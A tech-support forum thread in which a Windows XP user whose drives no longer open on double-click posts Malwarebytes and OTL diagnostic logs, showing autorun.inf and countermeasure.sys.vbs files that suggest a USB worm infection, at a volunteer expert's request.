Jump to content

Welcome to Geeks to Go - Register now for FREE

Geeks To Go is a helpful hub, where thousands of volunteer geeks quickly serve friendly answers and support. Check out the forums and get free advice from the experts. Register now to gain access to all of our features, it's FREE and only takes one minute. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more.

Create Account How it Works
Photo

Double-click on drives not working (?)


  • Please log in to reply

#1
couber

couber

    Member

  • Member
  • PipPip
  • 29 posts
Hi everybody!!!

This is the second post after the reply of Philipcorcoran that the problem might be an infection

After a system crash this morning, I have trouble entering in my drives by double clicking them at "My Computer" window. Windows recognize the drives normally and they are accessible either using left-click->explore or left-click open, but not by double-clicking(???).Plus a new "autorun" option - just like when you enter a USB flash drive(I'm not sure for the right word because I have the greek version) - appeared. I scanned for viruses with ESET Smart security without findings. Currently I scan again with eset and then I'll use Malware Byte's Anti-Malware.

I have WinXP SP3 fully updated. Please help!!!
  • 0

Advertisements


#2
RKinner

RKinner

    Malware Expert

  • Expert
  • 23,181 posts
  • MVP
Post the logs from http://www.geekstogo...uide-t2852.html
so we can see what is going on.

If you are seeing an autorun.inf file (not a folder) on your C:\ and other drives it is definitely an infection. You can usually look at the file with notepad and see what it is up to.

Start, Run, notepad c:\autorun.inf , OK

Copy the text and paste in in your reply along with your logs. (Please do not attach your logs - just copy and paste them too.)

Ron
  • 0

#3
couber

couber

    Member

  • Topic Starter
  • Member
  • PipPip
  • 29 posts
Hello,

Searching for the autorun.inf file was the first thing i did when double-clicking stopped working and i didn't find anything. Perhaps it was cleaned by Smart security. I don't know.

I followed the steps and now i post the results:

MBAM

Malwarebytes' Anti-Malware 1.11
Database version: 599

Scan type: Quick Scan
Objects scanned: 31378
Time elapsed: 2 minute(s), 21 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)

I couldn't complete the GMER scan due to system freezing(I tried twice)

OTL Log files

OTL logfile created on: 8/2/2010 10:14:32 μμ - Run 1
OTL by OldTimer - Version 3.1.28.0 Folder = C:\Documents and Settings\Bougioukli Sofia\Επιφάνεια εργασίας
Windows XP Professional Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 8.0.6001.18702)
Locale: 00000408 | Country: Ελλάδα | Language: ELL | Date Format: d/M/yyyy

511,00 Mb Total Physical Memory | 206,00 Mb Available Physical Memory | 40,00% Memory free
1,00 Gb Paging File | 1,00 Gb Available in Paging File | 78,00% Paging File free
Paging file location(s): C:\pagefile.sys 768 1536 [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 24,40 Gb Total Space | 3,30 Gb Free Space | 13,53% Space Free | Partition Type: FAT32
Drive D: | 12,83 Gb Total Space | 3,31 Gb Free Space | 25,82% Space Free | Partition Type: FAT32
E: Drive not present or media not loaded
F: Drive not present or media not loaded
G: Drive not present or media not loaded
H: Drive not present or media not loaded
Drive I: | 232,83 Gb Total Space | 213,12 Gb Free Space | 91,53% Space Free | Partition Type: FAT32

Computer Name: HOME-VYXPNW9L30
Current User Name: Bougioukli Sofia
Logged in as Administrator.

Current Boot Mode: Normal
Scan Mode: Current user
Company Name Whitelist: On
Skip Microsoft Files: On
File Age = 14 Days
Output = Standard
Quick Scan

========== Processes (SafeList) ==========

PRC - [2010/02/08 21:50:36 | 000,549,376 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\Bougioukli Sofia\Επιφάνεια εργασίας\OTL.exe
PRC - [2010/01/07 15:10:36 | 000,908,248 | ---- | M] (Mozilla Corporation) -- C:\Program Files\Mozilla Firefox\firefox.exe
PRC - [2009/12/22 01:57:28 | 000,035,760 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files\Adobe\Reader 9.0\Reader\reader_sl.exe
PRC - [2009/11/10 15:39:26 | 000,079,160 | ---- | M] (Yahoo! Inc.) -- C:\Program Files\Yahoo!\Messenger\Ymsgr_tray.exe
PRC - [2009/10/11 04:17:36 | 000,153,376 | ---- | M] (Sun Microsystems, Inc.) -- C:\Program Files\Java\jre6\bin\jqs.exe
PRC - [2009/10/11 04:17:36 | 000,149,280 | ---- | M] (Sun Microsystems, Inc.) -- C:\Program Files\Java\jre6\bin\jusched.exe
PRC - [2009/03/27 10:03:00 | 000,163,908 | ---- | M] (NVIDIA Corporation) -- C:\WINDOWS\system32\nvsvc32.exe
PRC - [2008/11/09 22:48:14 | 000,602,392 | ---- | M] (Yahoo! Inc.) -- C:\Program Files\Yahoo!\SoftwareUpdate\YahooAUService.exe
PRC - [2008/04/14 18:30:36 | 001,038,336 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\explorer.exe
PRC - [2007/12/21 08:21:16 | 000,468,224 | ---- | M] (ESET) -- C:\Program Files\ESET\ESET Smart Security\ekrn.exe
PRC - [2007/12/21 08:21:06 | 001,443,072 | ---- | M] (ESET) -- C:\Program Files\ESET\ESET Smart Security\egui.exe
PRC - [2006/05/16 11:58:18 | 000,213,936 | ---- | M] (Macrovision Corporation) -- C:\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe
PRC - [2005/12/19 11:38:12 | 001,646,592 | ---- | M] (Webshots.com) -- C:\Program Files\Webshots\webshots.scr
PRC - [2005/12/10 17:57:20 | 000,133,016 | ---- | M] (DT Soft Ltd.) -- C:\Program Files\DAEMON Tools\daemon.exe
PRC - [2003/10/08 11:41:10 | 000,057,344 | ---- | M] (Realtek Semiconductor Corp.) -- C:\WINDOWS\SOUNDMAN.EXE
PRC - [2001/12/22 06:02:06 | 000,004,608 | ---- | M] (Conexant Systems) -- C:\WINDOWS\system32\carpserv.exe


========== Modules (SafeList) ==========

MOD - [2010/02/08 21:50:36 | 000,549,376 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\Bougioukli Sofia\Επιφάνεια εργασίας\OTL.exe


========== Win32 Services (SafeList) ==========

SRV - [2009/10/11 04:17:36 | 000,153,376 | ---- | M] (Sun Microsystems, Inc.) [Auto | Running] -- C:\Program Files\Java\jre6\bin\jqs.exe -- (JavaQuickStarterService)
SRV - [2009/03/27 10:03:00 | 000,163,908 | ---- | M] (NVIDIA Corporation) [Auto | Running] -- C:\WINDOWS\system32\nvsvc32.exe -- (NVSvc)
SRV - [2008/11/09 22:48:14 | 000,602,392 | ---- | M] (Yahoo! Inc.) [Auto | Running] -- C:\Program Files\Yahoo!\SoftwareUpdate\YahooAUService.exe -- (YahooAUService)
SRV - [2007/12/21 08:22:44 | 000,019,200 | ---- | M] (ESET) [On_Demand | Stopped] -- C:\Program Files\ESET\ESET Smart Security\EHttpSrv.exe -- (EhttpSrv)
SRV - [2007/12/21 08:21:16 | 000,468,224 | ---- | M] (ESET) [Auto | Running] -- C:\Program Files\ESET\ESET Smart Security\ekrn.exe -- (ekrn)
SRV - [2006/12/05 23:38:08 | 000,072,704 | ---- | M] (Adobe Systems) [On_Demand | Stopped] -- C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe -- (Adobe LM Service)


========== Standard Registry (SafeList) ==========


========== Internet Explorer ==========


IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.yahoo.com/
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

========== FireFox ==========

FF - prefs.js..browser.search.param.yahoo-fr: "chrf-ytbm"
FF - prefs.js..browser.search.param.yahoo-fr-cjkt: "chrf-ytbm"
FF - prefs.js..browser.search.param.yahoo-type: "${8}"
FF - prefs.js..browser.search.useDBForOrder: true
FF - prefs.js..browser.startup.homepage: "http://www.yahoo.com"
FF - prefs.js..extensions.enabledItems: {d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}:1.1.3
FF - prefs.js..extensions.enabledItems: {D4DD63FA-01E4-46a7-B6B1-EDAB7D6AD389}:0.9.6.5
FF - prefs.js..extensions.enabledItems: [email protected]:1.0
FF - prefs.js..extensions.enabledItems: {285da7e0-729d-11db-9fe1-0800200c9a66}:2.20091201


FF - HKLM\software\mozilla\Mozilla Firefox 3.5.7\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2008/04/19 15:54:36 | 000,000,000 | ---D | M]
FF - HKLM\software\mozilla\Mozilla Firefox 3.5.7\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins [2008/04/19 15:54:36 | 000,000,000 | ---D | M]

[2008/10/26 13:15:48 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Bougioukli Sofia\Application Data\Mozilla\Extensions
[2008/04/19 15:56:28 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Bougioukli Sofia\Application Data\Mozilla\Firefox\Profiles\fsnyug2o.default\extensions
[2009/12/15 00:24:06 | 000,000,000 | ---D | M] (Tinseltown) -- C:\Documents and Settings\Bougioukli Sofia\Application Data\Mozilla\Firefox\Profiles\fsnyug2o.default\extensions\{285da7e0-729d-11db-9fe1-0800200c9a66}
[2010/01/08 18:17:08 | 000,000,000 | ---D | M] (Adblock Plus) -- C:\Documents and Settings\Bougioukli Sofia\Application Data\Mozilla\Firefox\Profiles\fsnyug2o.default\extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}
[2010/01/09 12:56:14 | 000,000,000 | ---D | M] (Download Statusbar) -- C:\Documents and Settings\Bougioukli Sofia\Application Data\Mozilla\Firefox\Profiles\fsnyug2o.default\extensions\{D4DD63FA-01E4-46a7-B6B1-EDAB7D6AD389}
[2009/12/15 00:24:08 | 000,000,000 | ---D | M] (No name found) -- C:\Documents and Settings\Bougioukli Sofia\Application Data\Mozilla\Firefox\Profiles\fsnyug2o.default\extensions\{285da7e0-729d-11db-9fe1-0800200c9a66}\chrome\mozapps\extensions
[2009/12/15 00:24:08 | 000,000,000 | ---D | M] (No name found) -- C:\Documents and Settings\Bougioukli Sofia\Application Data\Mozilla\Firefox\Profiles\fsnyug2o.default\extensions\{285da7e0-729d-11db-9fe1-0800200c9a66}\chrome\mozapps\extensions\CVS
[2008/10/26 14:14:48 | 000,002,447 | ---- | M] () -- C:\Documents and Settings\Bougioukli Sofia\Application Data\Mozilla\Firefox\Profiles\fsnyug2o.default\searchplugins\bsplayer-search.xml
[2009/11/02 20:35:44 | 000,002,279 | ---- | M] () -- C:\Documents and Settings\Bougioukli Sofia\Application Data\Mozilla\Firefox\Profiles\fsnyug2o.default\searchplugins\ask.xml
[2009/11/02 20:35:44 | 000,000,573 | ---- | M] () -- C:\Documents and Settings\Bougioukli Sofia\Application Data\Mozilla\Firefox\Profiles\fsnyug2o.default\searchplugins\yahoo.xml
[2008/04/19 15:54:36 | 000,000,000 | ---D | M] -- C:\Program Files\Mozilla Firefox\extensions
[2009/09/19 09:03:34 | 000,001,525 | ---- | M] () -- C:\Program Files\Mozilla Firefox\searchplugins\amazon-en-GB.xml
[2009/09/19 09:03:34 | 000,000,760 | ---- | M] () -- C:\Program Files\Mozilla Firefox\searchplugins\eBay-en-GB.xml
[2009/09/19 09:03:34 | 000,001,219 | ---- | M] () -- C:\Program Files\Mozilla Firefox\searchplugins\wikipedia-el.xml

O1 HOSTS File: ([2002/09/30 12:00:00 | 000,000,944 | ---- | M]) - C:\WINDOWS\system32\drivers\etc\hosts
O1 - Hosts: 127.0.0.1 localhost
O2 - BHO: (&Yahoo! Toolbar Helper) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll (Yahoo! Inc.)
O2 - BHO: (Adobe PDF Link Helper) - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
O2 - BHO: (Java™ Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
O2 - BHO: (JQSIEStartDetectorImpl Class) - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll (Sun Microsystems, Inc.)
O2 - BHO: (SingleInstance Class) - {FDAD4DA1-61A2-4FD8-9C17-86F7AC245081} - C:\Program Files\Yahoo!\Companion\Installs\cpn\YTSingleInstance.dll (Yahoo! Inc)
O3 - HKLM\..\Toolbar: (Easy-WebPrint) - {327C2873-E90D-4c37-AA9D-10AC9BABA46C} - C:\Program Files\Canon\Easy-WebPrint\Toolband.dll ()
O3 - HKLM\..\Toolbar: (Systran40premi.IEPlugIn) - {CFB25594-4D5F-11D6-AB7B-00B0D094B576} - C:\Program Files\Systran\4_0\Premium\IEPlugIn.dll (SYSTRAN)
O3 - HKLM\..\Toolbar: (Yahoo! Toolbar) - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll (Yahoo! Inc.)
O3 - HKCU\..\Toolbar\WebBrowser: (no name) - {2C688203-7EB3-4327-9995-1CB417BA23F9} - No CLSID value found.
O4 - HKLM..\Run: [Adobe ARM] C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe (Adobe Systems Incorporated)
O4 - HKLM..\Run: [Adobe Reader Speed Launcher] C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe (Adobe Systems Incorporated)
O4 - HKLM..\Run: [CARPService] C:\WINDOWS\System32\carpserv.exe (Conexant Systems)
O4 - HKLM..\Run: [DAEMON Tools] C:\Program Files\DAEMON Tools\daemon.exe (DT Soft Ltd.)
O4 - HKLM..\Run: [Easy-PrintToolBox] C:\Program Files\Canon\Easy-PrintToolBox\BJPSMAIN.EXE (CANON INC.)
O4 - HKLM..\Run: [egui] C:\Program Files\ESET\ESET Smart Security\egui.exe (ESET)
O4 - HKLM..\Run: [ISUSPM] C:\Program Files\Common Files\InstallShield\UpdateService\isuspm.exe (Macrovision Corporation)
O4 - HKLM..\Run: [MP10_EnsureFileVer] C:\WINDOWS\inf\unregmp2.exe (Microsoft Corporation)
O4 - HKLM..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe (Ahead Software Gmbh)
O4 - HKLM..\Run: [NvCplDaemon] C:\WINDOWS\System32\NvCpl.DLL (NVIDIA Corporation)
O4 - HKLM..\Run: [NvMediaCenter] C:\WINDOWS\System32\NvMcTray.DLL (NVIDIA Corporation)
O4 - HKLM..\Run: [NWEReboot] File not found
O4 - HKLM..\Run: [nwiz] C:\WINDOWS\System32\nwiz.exe ()
O4 - HKLM..\Run: [QuickTime Task] C:\Program Files\QuickTime\QTTask.exe (Apple Inc.)
O4 - HKLM..\Run: [SoundMan] C:\WINDOWS\SOUNDMAN.EXE (Realtek Semiconductor Corp.)
O4 - HKLM..\Run: [SunJavaUpdateSched] C:\Program Files\Java\jre6\bin\jusched.exe (Sun Microsystems, Inc.)
O4 - HKCU..\Run: [Messenger (Yahoo!)] C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe (Yahoo! Inc.)
O4 - Startup: C:\Documents and Settings\All Users\Start Menu\Προγράμματα\Εκκίνηση\Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office\OSA9.EXE (Microsoft Corporation)
O4 - Startup: C:\Documents and Settings\Bougioukli Sofia\Start Menu\Προγράμματα\Εκκίνηση\Webshots.lnk = C:\Program Files\Webshots\Launcher.exe ()
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: HonorAutoRunSetting = 1
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O8 - Extra context menu item: Easy-WebPrint Add To Print List - C:\Program Files\Canon\Easy-WebPrint\Resource.dll ()
O8 - Extra context menu item: Easy-WebPrint High Speed Print - C:\Program Files\Canon\Easy-WebPrint\Resource.dll ()
O8 - Extra context menu item: Easy-WebPrint Preview - C:\Program Files\Canon\Easy-WebPrint\Resource.dll ()
O8 - Extra context menu item: Easy-WebPrint Print - C:\Program Files\Canon\Easy-WebPrint\Resource.dll ()
O8 - Extra context menu item: Ε&ξαγωγή στο Microsoft Excel - C:\Program Files\Microsoft Office\Office10\EXCEL.EXE (Microsoft Corporation)
O15 - HKLM\..Trusted Domains: 1 domain(s) and sub-domain(s) not assigned to a zone.
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} http://www.update.mi...b?1225023621124 (WUWebControl Class)
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_17)
O16 - DPF: {CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Reg Error: Key error.)
O16 - DPF: {CAFEEFAC-0016-0000-0017-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_17)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_17)
O16 - DPF: DirectAnimation Java Classes file://C:\WINDOWS\Java\classes\dajava.cab (Reg Error: Key error.)
O16 - DPF: Microsoft XML Parser for Java file://C:\WINDOWS\Java\classes\xmldso.cab (Reg Error: Key error.)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.254
O20 - HKLM Winlogon: Shell - (Explorer.exe) - C:\WINDOWS\explorer.exe (Microsoft Corporation)
O20 - Winlogon\Notify\Antiwpa: DllName - antiwpa.dll - C:\WINDOWS\System32\antiwpa.dll ()
O24 - Desktop Components:0 (Τρέχουσα αρχική σελίδα) - About:Home
O24 - Desktop WallPaper: C:\Documents and Settings\Bougioukli Sofia\Local Settings\Application Data\Microsoft\Wallpaper1.bmp
O24 - Desktop BackupWallPaper: C:\Documents and Settings\Bougioukli Sofia\Local Settings\Application Data\Microsoft\Wallpaper1.bmp
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2005/03/13 12:18:36 | 000,000,000 | ---- | M] () - C:\AUTOEXEC.BAT -- [ FAT32 ]
O32 - AutoRun File - [2010/02/08 16:55:36 | 000,000,118 | RHS- | M] () - C:\autorun.inf -- [ FAT32 ]
O32 - AutoRun File - [2010/02/08 16:55:36 | 000,000,118 | RHS- | M] () - D:\autorun.inf -- [ FAT32 ]
O32 - AutoRun File - [2010/02/08 16:55:38 | 000,000,118 | RHS- | M] () - I:\autorun.inf -- [ FAT32 ]
O32 - AutoRun File - [2010/02/07 18:22:28 | 000,000,000 | ---D | M] - I:\autorun -- [ FAT32 ]
O33 - MountPoints2\{0f6518b8-51b6-11de-8b70-000a4808cb2a}\Shell - "" = AutoRun
O33 - MountPoints2\{1067fcff-93b8-11d9-95b6-806d6172696f}\Shell - "" = AutoRun
O33 - MountPoints2\{1067fd00-93b8-11d9-95b6-806d6172696f}\Shell - "" = AutoRun
O33 - MountPoints2\{ba2f3b64-bd97-11de-8bde-000a4808cb2a}\Shell - "" = AutoRun
O33 - MountPoints2\{d91db6b2-a386-11dd-8a47-4d6564696130}\Shell - "" = AutoRun
O33 - MountPoints2\I\Shell - "" = AutoRun
O34 - HKLM BootExecute: (autocheck autochk *) - File not found
O35 - comfile [open] -- "%1" %*
O35 - exefile [open] -- "%1" %*

NetSvcs: 6to4 - File not found
NetSvcs: Ias - C:\WINDOWS\system32\ias [2005/03/13 12:06:40 | 000,000,000 | ---D | M]
NetSvcs: Iprip - File not found
NetSvcs: Irmon - File not found
NetSvcs: NWCWorkstation - File not found
NetSvcs: Nwsapagent - File not found
NetSvcs: WmdmPmSp - File not found

CREATERESTOREPOINT
Restore point Set: OTL Restore Point (16891891626803200)

========== Files/Folders - Created Within 14 Days ==========

[2010/02/08 21:50:17 | 000,549,376 | ---- | C] (OldTimer Tools) -- C:\Documents and Settings\Bougioukli Sofia\Επιφάνεια εργασίας\OTL.exe
[2010/02/07 16:12:23 | 000,038,224 | ---- | C] (Malwarebytes Corporation) -- C:\WINDOWS\System32\drivers\mbamswissarmy.sys
[2010/02/07 16:12:18 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Malwarebytes
[2010/02/07 16:12:17 | 000,019,160 | ---- | C] (Malwarebytes Corporation) -- C:\WINDOWS\System32\drivers\mbam.sys
[2010/02/07 16:12:15 | 000,000,000 | ---D | C] -- C:\Program Files\Malwarebytes' Anti-Malware
[2010/02/07 13:35:14 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Bougioukli Sofia\Τα έγγραφά μου\WDC
[2010/02/03 19:58:03 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Bougioukli Sofia\Τα έγγραφά μου\Downloads
[2010/01/26 21:58:19 | 000,000,000 | -HSD | C] -- C:\Config.Msi
[2008/10/05 19:24:30 | 000,000,000 | ---D | M] -- C:\Documents and Settings\LocalService\Local Settings\Application Data\ESET
[2005/03/13 12:21:10 | 000,000,000 | ---D | M] -- C:\Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft
[2005/03/13 12:21:10 | 000,000,000 | ---D | M] -- C:\Documents and Settings\LocalService\Local Settings\Application Data\Microsoft
[2005/03/13 12:10:10 | 000,000,000 | --SD | M] -- C:\Documents and Settings\NetworkService\Application Data\Microsoft
[2005/03/13 12:10:10 | 000,000,000 | --SD | M] -- C:\Documents and Settings\LocalService\Application Data\Microsoft

========== Files - Modified Within 14 Days ==========

[2010/02/08 22:11:44 | 000,199,985 | ---- | M] () -- C:\WINDOWS\System32\nvapps.xml
[2010/02/08 22:11:32 | 000,000,006 | -H-- | M] () -- C:\WINDOWS\tasks\SA.DAT
[2010/02/08 22:11:26 | 000,002,048 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2010/02/08 21:50:36 | 000,549,376 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\Bougioukli Sofia\Επιφάνεια εργασίας\OTL.exe
[2010/02/08 16:58:04 | 006,553,600 | ---- | M] () -- C:\Documents and Settings\Bougioukli Sofia\ntuser.dat
[2010/02/08 16:55:36 | 000,004,944 | RHS- | M] () -- C:\WINDOWS\countermeasure.sys.vbs
[2010/02/08 16:55:36 | 000,004,944 | RHS- | M] () -- C:\countermeasure.sys.vbs
[2010/02/08 16:55:36 | 000,000,118 | RHS- | M] () -- C:\autorun.inf
[2010/02/08 15:33:20 | 000,000,049 | ---- | M] () -- C:\WINDOWS\NeroDigital.ini
[2010/02/08 15:33:18 | 000,124,928 | ---- | M] () -- C:\Documents and Settings\Bougioukli Sofia\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2010/02/07 18:20:18 | 000,054,156 | -H-- | M] () -- C:\WINDOWS\QTFont.qfn
[2010/02/07 18:20:18 | 000,001,409 | ---- | M] () -- C:\WINDOWS\QTFont.for
[2010/02/07 18:18:02 | 000,002,278 | ---- | M] () -- C:\WINDOWS\System32\wpa.dbl
[2010/02/07 17:08:40 | 000,000,278 | -HS- | M] () -- C:\Documents and Settings\Bougioukli Sofia\ntuser.ini
[2010/02/07 16:12:32 | 000,000,600 | ---- | M] () -- C:\Documents and Settings\All Users\Επιφάνεια εργασίας\Malwarebytes' Anti-Malware.lnk
[2010/01/26 21:58:56 | 000,001,633 | ---- | M] () -- C:\Documents and Settings\All Users\Επιφάνεια εργασίας\Adobe Reader 9.lnk

========== Files Created - No Company Name ==========

[2010/02/07 18:20:17 | 000,054,156 | -H-- | C] () -- C:\WINDOWS\QTFont.qfn
[2010/02/07 18:20:17 | 000,001,409 | ---- | C] () -- C:\WINDOWS\QTFont.for
[2010/02/07 18:17:03 | 000,005,376 | ---- | C] () -- C:\WINDOWS\System32\antiwpa.dll
[2010/02/07 16:12:30 | 000,000,600 | ---- | C] () -- C:\Documents and Settings\All Users\Επιφάνεια εργασίας\Malwarebytes' Anti-Malware.lnk
[2010/01/26 21:58:55 | 000,001,633 | ---- | C] () -- C:\Documents and Settings\All Users\Επιφάνεια εργασίας\Adobe Reader 9.lnk
[2010/01/26 19:29:16 | 000,004,944 | RHS- | C] () -- C:\WINDOWS\countermeasure.sys.vbs
[2010/01/26 19:29:16 | 000,004,944 | RHS- | C] () -- C:\countermeasure.sys.vbs
[2010/01/26 19:29:16 | 000,000,118 | RHS- | C] () -- C:\autorun.inf
[2008/11/23 12:49:39 | 000,162,304 | ---- | C] () -- C:\Program Files\UNWISE.EXE
[2008/09/05 14:52:59 | 000,023,040 | R--- | C] () -- C:\WINDOWS\System32\drivers\GVCplDrv.sys
[2008/07/04 00:43:35 | 000,001,747 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\QTSBandwidthCache
[2008/07/04 00:33:47 | 000,000,046 | ---- | C] () -- C:\WINDOWS\adiras.ini
[2008/02/24 09:47:05 | 000,271,360 | ---- | C] () -- C:\WINDOWS\System32\drivers\atksgt.sys
[2008/02/24 09:47:04 | 000,018,048 | ---- | C] () -- C:\WINDOWS\System32\drivers\lirsgt.sys
[2007/11/01 23:59:04 | 000,010,752 | ---- | C] () -- C:\WINDOWS\System32\BASSMOD.dll
[2007/11/01 23:58:02 | 000,041,472 | ---- | C] () -- C:\WINDOWS\System32\indexudf.dll
[2006/11/02 20:38:50 | 000,000,139 | ---- | C] () -- C:\Documents and Settings\Bougioukli Sofia\Local Settings\Application Data\fusioncache.dat
[2006/10/09 14:36:33 | 000,223,128 | ---- | C] () -- C:\WINDOWS\System32\drivers\dtscsi.sys
[2006/10/09 14:34:56 | 000,642,560 | ---- | C] () -- C:\WINDOWS\System32\drivers\sptd.sys
[2006/10/09 14:34:56 | 000,096,384 | ---- | C] () -- C:\WINDOWS\System32\drivers\sptd7533.sys
[2006/10/02 23:50:37 | 000,000,812 | ---- | C] () -- C:\WINDOWS\disney.ini
[2006/06/17 16:18:53 | 000,000,112 | ---- | C] () -- C:\WINDOWS\ActiveSkin.INI
[2006/02/26 21:46:40 | 000,002,438 | ---- | C] () -- C:\WINDOWS\CDPlayer.ini
[2006/02/26 21:13:19 | 000,027,136 | ---- | C] () -- C:\WINDOWS\System32\QTUninst.dll
[2005/11/08 00:37:23 | 000,000,155 | ---- | C] () -- C:\WINDOWS\winamp.ini
[2005/11/07 18:59:52 | 000,000,058 | ---- | C] () -- C:\WINDOWS\autmtst.ini
[2005/09/22 12:38:26 | 000,010,240 | ---- | C] () -- C:\WINDOWS\System32\vidx16.dll
[2005/09/22 12:30:33 | 000,000,029 | ---- | C] () -- C:\WINDOWS\SIERRA.INI
[2005/07/20 16:07:00 | 001,724,416 | ---- | C] () -- C:\WINDOWS\System32\nvwdmcpl.dll
[2005/07/20 16:07:00 | 001,503,232 | ---- | C] () -- C:\WINDOWS\System32\nview.dll
[2005/07/20 16:07:00 | 001,101,824 | ---- | C] () -- C:\WINDOWS\System32\nvwimg.dll
[2005/07/20 16:07:00 | 000,540,672 | ---- | C] () -- C:\WINDOWS\System32\nvhwvid.dll
[2005/07/20 16:07:00 | 000,466,944 | ---- | C] () -- C:\WINDOWS\System32\nvshell.dll
[2005/04/04 17:46:45 | 000,363,520 | ---- | C] () -- C:\WINDOWS\System32\psisdecd.dll
[2005/03/27 21:47:11 | 000,002,112 | ---- | C] () -- C:\WINDOWS\Lexicon.ini
[2005/03/24 16:14:30 | 000,000,000 | ---- | C] () -- C:\WINDOWS\OpPrintServer.INI
[2005/03/24 16:12:50 | 000,007,680 | ---- | C] () -- C:\WINDOWS\System32\CNMVS5y.DLL
[2005/03/13 18:22:26 | 000,124,928 | ---- | C] () -- C:\Documents and Settings\Bougioukli Sofia\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2005/03/13 13:02:43 | 000,000,049 | ---- | C] () -- C:\WINDOWS\NeroDigital.ini
[2005/03/13 12:52:28 | 000,000,748 | ---- | C] () -- C:\WINDOWS\ODBC.INI
[2005/03/13 12:40:09 | 000,000,169 | ---- | C] () -- C:\WINDOWS\RtlRack.ini
[2005/03/13 12:38:27 | 000,000,164 | ---- | C] () -- C:\WINDOWS\avrack.ini
[2004/12/20 11:08:28 | 000,155,648 | ---- | C] () -- C:\WINDOWS\System32\xvidvfw.dll
[2004/12/20 11:03:26 | 000,679,936 | ---- | C] () -- C:\WINDOWS\System32\xvidcore.dll
[2002/03/21 15:39:02 | 000,073,728 | ---- | C] () -- C:\WINDOWS\System32\UNACEV2.DLL

========== LOP Check ==========

[2005/03/13 13:06:58 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\ACD Systems
[2006/02/15 20:22:42 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Electronic Arts
[2008/04/19 15:58:24 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\TEMP
[2008/07/02 20:43:10 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\ESET
[2008/10/12 23:29:30 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\PlayFirst
[2008/11/22 00:27:06 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Sandlot Games
[2008/11/22 00:47:04 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\FreshGames
[2009/05/11 17:25:50 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Oberon Games
